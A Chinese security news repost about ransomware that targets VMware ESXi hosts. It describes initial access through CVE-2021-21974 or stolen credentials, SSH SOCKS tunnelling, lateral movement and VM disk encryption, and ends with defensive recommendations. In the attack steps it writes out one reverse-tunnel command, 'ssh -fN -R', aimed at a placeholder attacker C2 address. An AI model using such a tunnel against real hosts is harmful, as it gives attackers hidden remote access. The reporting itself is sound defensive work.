更多全球网络安全资讯尽在邑安全
新的勒索软件菌株通过设置 SSH 隧道并将恶意流量隐藏在合法活动中,悄悄渗透到 VMware ESXi 主机中。
这种隐蔽策略允许攻击者访问关键的虚拟机环境,而无需触发许多标准警报或检测系统来监控更传统的网络路径。
由于 ESXi 设备通常不受监控,因此网络犯罪分子抓住机会隐藏在众目睽睽之下,泄露数据,并以最小的干扰锁定虚拟机。
虚拟化基础设施是勒索软件行为者的诱人目标,因为虚拟机的价值很高,而且如果攻击者夺取控制权,可能会造成快速损害。
Sygnia 说,犯罪分子可以专注于 ESXi 主机本身,从而能够在一次协同攻击中加密所有虚拟磁盘,而不是单独破坏每个来宾系统。
一旦虚拟机无法访问,组织就会发现自己在争先恐后地恢复关键功能或考虑付款要求。在这些事件中,业务连续性、声誉和收入都面临重大危险。
除了加密之外,攻击者还使用 ESXi 服务器作为枢轴点,在企业网络内部获得更广泛的访问权限。通过使用 SSH 创建 SOCKS 隧道,威胁行为者可以横向移动并将流量与日常管理操作混合。
受感染的系统很少重新启动,并且通常记录不足,成为安装持久性后门程序的理想环境。
攻击的工作原理
-
初始访问:
攻击者通过利用漏洞(例如 CVE-2021-21974)或使用被盗的管理凭据来访问 VMware ESXi 主机。这些方法允许他们绕过身份验证并建立对设备的控制。 -
建立 SSH 隧道:
一旦进入,攻击者就会使用 ESXi 设备的本机 SSH 功能来创建 SOCKS 隧道。这通常通过如下命令实现:text此远程端口转发设置将受感染的 ESXi 主机链接到攻击者的命令和控制 (C2) 服务器,使他们能够通过主机路由恶意流量,同时混入合法网络活动。ssh –fN -R 127.0.0.1:<SOCKS port> <user>@<C2 IP address>
-
持久性:
ESXi 设备很少重启,因此非常适合在网络内维护半持久性后门。SSH 隧道保持活动状态,允许攻击者在不被发现的情况下继续他们的操作。 -
侦察和横向移动:
攻击者使用已建立的隧道在受感染的网络内执行侦察,识别其他目标和敏感数据。 -
加密和勒索部署:
在收集情报后,攻击者部署勒索软件负载来加密关键的虚拟机文件,例如(虚拟磁盘文件)和(分页文件)。这使得整个虚拟化环境无法访问。然后发出赎金要求,通常伴随着数据泄露或公开披露的威胁。.vmdk
.vmem
ESXi 服务器的日志记录架构使取证调查复杂化。与集中式 syslog 系统不同,ESXi 将日志分发到多个文件,例如(shell 活动)和(身份验证事件)。/var/log/shell.log/var/log/auth.log
这种碎片化需要调查人员将来自各种来源的证据拼凑在一起。此外,使用 SSH 隧道将恶意活动掩盖为正常的管理流量。由于许多组织不会主动监控其 ESXi 环境,因此这些攻击可能会持续很长时间而不被发现。
研究人员建议限制管理权限并确保在 ESXi 主机上默认禁用 SSH,仅在绝对必要时激活它。定期应用补丁来修复漏洞,尤其是那些支持远程代码执行或凭据盗窃的漏洞,也至关重要。强身份验证策略(包括多因素方法)可降低暴力破解管理凭据的可能性。
新一波勒索软件浪潮表明,攻击者不断适应,以利用虚拟基础架构中被忽视的角落。
通过在 ESXi 环境中优先考虑安全控制并密切监控 SSH 使用情况,组织可以领先于威胁并保持其虚拟化操作的可靠性。
原文来自: cybersecuritynews.com
原文链接: https://cybersecuritynews.com/ransomware-attacking-vmware-esxi-hosts/
原文始发于微信公众号(邑安全):新的勒索软件通过SSH隧道攻击VMware ESXi主机
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论